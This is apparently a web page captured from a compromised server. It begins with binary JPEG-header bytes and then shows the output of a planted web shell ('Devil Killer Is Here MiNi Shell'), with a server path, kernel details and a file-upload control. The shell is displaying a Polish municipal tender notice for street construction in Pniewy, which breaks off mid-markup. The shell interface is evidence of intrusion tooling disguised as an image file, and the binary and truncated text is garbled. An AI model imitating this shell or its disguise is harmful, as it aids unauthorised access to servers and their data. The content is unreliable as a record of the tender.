JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250425/0020630801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ulic Sasankowej, Różanej, Lawendowej w Pniewach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PNIEWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258247</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworcowa 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pniewy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@pniewy.wlkp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pniewy.wlkp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ulic Sasankowej, Różanej, Lawendowej w Pniewach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-36b8a349-24dc-4b4a-a4f1-4ba53bcb8b7d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00206308</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00054983/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 2025: Budowa ulic Sasankowej, Różanej, Lawendowej w Pniewach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pniewy_wlkp <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja będzie prowadzona będzie za pomocą:<br/>https://platformazakupowa.pl/pn/pniewy_wlkp</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z zapisami SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z zapisami SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z zapisami SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZT.272.2.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Szczegółowy opis przedmiotu zamówienia: Budowa ulic Sasankowej, Różanej, Lawendowej w Pniewach. <br/>Zakres prac obejmuje w szczególności:<br/>Inwestycja obejmuje budowę dróg, ulic Sasankowej i części Różanej w Pniewach, oznaczonych na planie zagospodarowania stanowiącym cześć Projektu Zagospodarowania Terenu, jako drogi 1 i 3 oraz uzupełnienie oświetlenia drogowego na ul. Różanej i Lawendowej w Pniewach. <br/>Droga 1 – ul. Sasankowa <br/>1)	roboty drogowe:<br/>a)	roboty przygotowawcze i rozbiórkowe;<br/>b)	roboty ziemne;<br/>c)	podbudowy:<br/>	mechaniczne profilowanie i zagęszczenie podłoża - 1540,00 m2,<br/>	podbudowa z betonu C3/4 gr. 15cm – jezdnia - 1030,00 m2,<br/>	podbudowa z betonu C3/4 gr. 10cm - materiał dowieziony - ciąg pieszy i dojścia do furtek – 100,00 m2,<br/>	podbudowa z chudego betonu C6/8 gr. 20cm - materiał dowieziony – jezdnia – 1030,00 m2,<br/>	podbudowa z chudego betonu C6/8 gr. 20cm - materiał dowieziony – zjazdy – 140,00 m2,<br/>	Podbudowa z chudego betonu C6/8 gr. 20cm - materiał dowieziony – zatoki parkingowe – 270,00 m2<br/>d)	elementy ulic:<br/>	obrzeże betonowe 30x8cm - 70,00 m,<br/>	ława pod obrzeża betonowa z oporem z betonu C12/15 - 4,20 m3,<br/>	opornik betonowy wtapiany 12x25 cm - 170,00 m, <br/>	ława pod opornik betonowa z oporem z betonu C12/15 - 11,90 m3,<br/>	krawężnik betonowy 15x30 cm - 120,00 m, <br/>	ława pod krawężnik betonowa z oporem z betonu C12/15 - 10,80 m3,<br/>	krawężnik betonowy najazdowy 15x22cm – 260,00 m,<br/>	ława pod krawężnik betonowa z oporem z betonu C12/15 – 23,40 m3,<br/>	ściek z dwóch rzędów kostki brukowej betonowej koloru szarego na ławie betonowej z betonu C12/15 - 145,00 m,<br/>e)	nawierzchnie:<br/>	nawierzchnie z kostki betonowej czerwonej grub. 8 cm na podsypce cementowo-piaskowej – zjazdy – 140,00 m2,<br/>	nawierzchnie z kostki betonowej grafitowej grub. 8 cm na podsypce cementowo-piaskowej - zatoki parkingowe – 270,00 m2,<br/>	nawierzchnie z kostki betonowej szarej grub. 8 cm na podsypce cementowo-piaskowej – jezdnia – 1030,00 m2,<br/>	nawierzchnie z kostki betonowej szarej grub. 8 cm na podsypce cementowo-piaskowej - ciąg pieszy i dojścia do furtek – 100,00 m2<br/>f)	roboty w zakresie regulacji ruchu:<br/>	regulacja pionowa włazów kanałowych studni rewizyjnych – 6,00 szt.,<br/>	regulacja pionowa studzienki telefonicznej – 5,00 szt.,<br/>	regulacja pionowa zaworów – 12,00 szt.,<br/>	słupek do znaku drogowego z rur stalowych – 5,00 szt.,<br/>	przymocowanie znaku drogowego zgodnie z projektem organizacji ruchu – 19,00 szt.,<br/>g)	roboty w zakresie kształtowania terenów zielonych<br/>	humusowanie wraz z wykonaniem trawników dywanowych siewem - 610,00 m2,<br/>2)	roboty w zakresie kanalizacji deszczowej:<br/>a)	roboty przygotowawcze i ziemne, <br/>b)	roboty montażowe:<br/>	rura kanalizacyjna PVC-U DN200 (fi200x5,9mm) kl.SN8 SDR34, rury lite - wykopy umocnione – 12,80 m,<br/>	rura kanalizacyjna PVC-U DN315 (fi315x9,2mm) kl. SN8 SDR34, rury lite- wykopy umocnione – 44,60 m, <br/>	rura kanalizacyjna PVC-U DN400 (fi400x11,7mm) kl. SN8 SDR34, rury lite - wykopy umocnione – 90,50 m, <br/>	studnie kanalizacyjne z elementów betonowych i żelbetowych Dn1000 mm kompletne wraz z przejściami dla rur kompletne – 6,00 szt., <br/>	wpusty ściekowe z elementów betonowych Dn500 z 1,0 m osadnikiem kompletne – 5,00 szt.,<br/>	taśma ostrzegawcza koloru zielonego – 147,90 m,<br/>	próby szczelność ww. kanałów rurowych,<br/>Droga 3 – cześć ul. Różanej <br/>1)	roboty drogowe:<br/>a)	roboty przygotowawcze i rozbiórkowe;<br/>b)	roboty ziemne;<br/>c)	podbudowy:<br/>	mechaniczne profilowanie i zagęszczenie podłoża - 1590,00 m2,<br/>	podbudowa z betonu C3/4 gr. 15cm – jezdnia - 880,00 m2,<br/>	podbudowa z betonu C3/4 gr. 10cm - materiał dowieziony - ciąg pieszy i dojścia do furtek – 70,00 m2,<br/>	podbudowa z chudego betonu C6/8 gr. 20cm - materiał dowieziony – jezdnia – 880,00 m2,<br/>	podbudowa z chudego betonu C6/8 gr. 20cm - materiał dowieziony – zjazdy – 430,00 m2,<br/>	Podbudowa z chudego betonu C6/8 gr. 20cm - materiał dowieziony – zatoki parkingowe – 210,00 m2,<br/>d)	elementy ulic:<br/>	obrzeże betonowe 30x8cm - 75,00 m,<br/>	ława pod obrzeża betonowa z oporem z betonu C12/15 - 4,50 m3,<br/>	opornik betonowy wtapiany 12x25 cm - 295,00 m, <br/>	ława pod opornik betonowa z oporem z betonu C12/15 - 20,65 m3,<br/>	krawężnik betonowy najazdowy 15x22cm – 380,00 m,<br/>	ława pod krawężnik betonowa z oporem z betonu C12/15 – 34,20 m3,<br/>	ściek z dwóch rzędów kostki brukowej betonowej koloru szarego na ławie betonowej z betonu C12/15 - 200,00 m,<br/>e)	nawierzchnie:<br/>	nawierzchnie z kostki betonowej czerwonej grub. 8 cm na podsypce cementowo-piaskowej – zjazdy – 430,00 m2,<br/>	nawierzchnie z kostki betonowej grafitowej grub. 8 cm na podsypce cementowo-piaskowej - zatoki parkingowe – 210,00 m2,<br/>	nawierzchnie z kostki betonowej szarej grub. 8 cm na podsypce cementowo-piaskowej – jezdnia – 880,00 m2,<br/>	nawierzchnie z kostki betonowej szarej grub. 8 cm na podsypce cementowo-piaskowej - ciąg pieszy i dojścia do furtek – 70,00 m2<br/>f)	roboty w zakresie regulacji ruchu:<br/>	regulacja pionowa włazów kanałowych studni rewizyjnych – 2,00 szt.,<br/>	regulacja pionowa studzienki telefonicznej – 3,00 szt.,<br/>	regulacja pionowa zaworów – 30,00 szt.,<br/>	słupek do znaku drogowego z rur stalowych – 9,00 szt.,<br/>	przymocowanie znaku drogowego zgodnie z projektem organizacji ruchu – 13,00 szt.,<br/>	Odtworzenie nawierzchni wraz z podbudową po kanalizacji deszczowej w ulicy Jagiellońskiej (15cm C3/4 + 20cm C6/8 + kostka gr. 8cm /80% z rozbiórki/) – 45,00 m2,<br/>g)	roboty w zakresie kształtowania terenów zielonych<br/>	humusowanie wraz z wykonaniem trawników dywanowych siewem - 840,00 m2,<br/>2)	roboty w zakresie kanalizacji deszczowej:<br/>c)	roboty przygotowawcze i ziemne <br/>d)	roboty montażowe:<br/>	rura kanalizacyjna PVC-U DN200 (fi200x5,9mm) kl.SN8 SDR34, rury lite - wykopy umocnione – 9,60 m,<br/>	rura kanalizacyjna PVC-U DN500 (fi500x14,6mm) kl. SN8 SDR34, rury lite - wykopy umocnione– 213,50 m, <br/>	studnie kanalizacyjne z elementów betonowych i żelbetowych Dn1000 mm kompletne wraz z przejściami dla rur kompletne – 10,00 szt., <br/>	wpusty ściekowe z elementów betonowych Dn500 z 1,0 m osadnikiem kompletne – 6,00 szt.,<br/>	taśma ostrzegawcza koloru zielonego – 223,10 m,<br/>	wpięcie do istniejącej studni kanalizacyjnej - przejście szczelne np. typu „ZW” DN500 firmy Integra Gliwice – 1,00 szt.,<br/>	próby szczelność ww. kanałów rurowych,<br/>Kanał technologiczny w drodze 1 i 3: <br/>	budowa studni kablowych prefabrykowanych rozdzielczych typu SKR1 w gruncie - kat. III z zabezpieczeniem zamkiem lub kłódką – 7,00 studni,<br/>	budowa kanalizacji kablowej z rur: 1xHDPE 110/6,3, 3xHDPE 40/3,7, 1xHDPE 40 z pakietem mikrorurek 7 x HDPE 12/8 – 369,00 m,<br/>	układanie w wykopie rur ochronnych; rury osłonowe gładkie HDPE 140/8,0 – 123,00 m,<br/>	badanie szczelności zmontowanych odcinków kanalizacji wtórnej i rurociągów kablowych o długości do 2 km w ziemi, przy pomocy sprężarki, dla rur o średnicy: 40 mm – 4,00 odc., <br/>	wywóz ziemi samochodami samowyładowczymi z załadowaniem i wyładowaniem gruntu kategorii: III – 29,52 m3<br/>Oświetlenie drogowe w ul. Różanej i Lawendowej - obejmującą słupy oświetleniowe z oprawami LED – 5,00 szt. wraz z okablowaniem oraz przestawienie 1 słupa oświetleniowego wraz z fundamentem. <br/><br/>Szczegółowy zakres robót został wskazany w dokumentacji, przedmiarze robót oraz Specyfikacji Technicznej Wykonania i Odbioru Robót (STWiOR).<br/><br/>W skład przedmiotu zamówienia wchodzą wszystkie czynności potrzebne do realizacji zadania, w tym w szczególności:<br/>1)	geodezyjne czynności pomiarowe, w tym sporządzenie powykonawczej inwentaryzacji geodezyjnej;<br/>2)	udział osób uprawnionych do pełnienia indywidualnych funkcji w budownictwie, do kierowania robotami w branży drogowej sanitarnej i elektrycznej;<br/>3)	wypełnienie zapisów wynikających z uzyskanych uzgodnień z operatorami sieci znajdujących się w drodze wraz z pokryciem wszelkich innych kosztów związanych z ww. pracami;<br/>4)	wykonanie projektu tymczasowej organizacji ruchu drogowego na czas realizacji robót i uzyskania jego zatwierdzenia zgodnie z obowiązującymi przepisami. Na Wykonawcy ciąży obowiązek uzgodnienia z właścicielami nieruchomości dojazdu, w czasie prowadzenia robót, do nieruchomości położonych przy drodze objętej inwestycją. W przypadku roszczeń ze strony właścicieli nieruchomości, związanych z brakiem możliwości dojazdu, na Wykonawcy ciąży obowiązek ich zaspokojenia. Wykonawca ma również umożliwić odbiór odpadów z nieruchomości położnych przy drodze; <br/>5)	wykonanie dokumentacji odbiorowej zgodnie z zapisami umowy.<br/>Wykonawca, zgodnie ze swoją ofertą, może powierzyć wykonanie części robót podwykonawcom, za wyjątkiem robót związanych z wykonaniem konstrukcji drogowych oraz nawierzchni z kostki betonowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233150-5 - Roboty w zakresie regulacji ruchu</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1.	Zamówienia, o których mowa w art. 214 ust 1 pkt 7 ustawy.<br/>Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych czyli tzw. zamówienia „uzupełniającego” do 50% wartości zamówienia podstawowego, polegających na powtórzeniu podobnych robót budowlanych, w szczególności wykonaniu przebudowy odcinka drogi, zjazdów, nawierzchni wraz z konstrukcją, elementów dróg np. krawężniki, oporniki, przedłużenie chodników, zjazdów, oznakowanie, roboty kanalizacyjne, roboty elektryczne, roboty teletechniczne, roboty w zakresie zieleni; na warunkach wynikających z umowy dla zamówienia podstawowego z zastrzeżeniem zmian terminów realizacji oraz cen jednostkowych po przeprowadzonych negocjacjach. Zamówienie zostanie udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel. Zamawiający może udzielić jednego zamówienia lub kilku zamówień na ten zakres robót.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: Wykonawca spełni warunek jeżeli wykaże, że:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a)	w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej trzy roboty budowlane porównywalne <br/>z przedmiotem zamówienia tj. polegające na budowie, przebudowie lub remoncie drogi wraz z instalacją kanalizacji deszczowej wartości minimum 1.500.000,00 zł (słownie: jedne milion pięćset tysięcy złotych) brutto każda oraz potwierdzi, że roboty te zostały wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone,<br/>b)	dysponuje lub będzie dysponował osobą/ osobami, które będą pełnić funkcję: <br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>3.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie <br/>z formułą: „spełnia- nie spełnia” na podstawie złożonych oświadczeń, dokumentów wymaganych przez Zamawiającego. Niespełnienie chociaż jednego z ww. warunków skutkować będzie odrzuceniem oferty Wykonawcy<br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek określony w ust. 2 pkt 4 ppkt a) zostanie spełniony wyłącznie, jeżeli jeden <br/>z wykonawców spełni warunek samodzielnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2)	Aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp tj. o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu - zgodne z załącznikiem nr 2 do SWZ.<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, podpisem osobistym lub podpisem kwalifikowanym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne odpowiednie dokumenty - załącznik nr 3 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 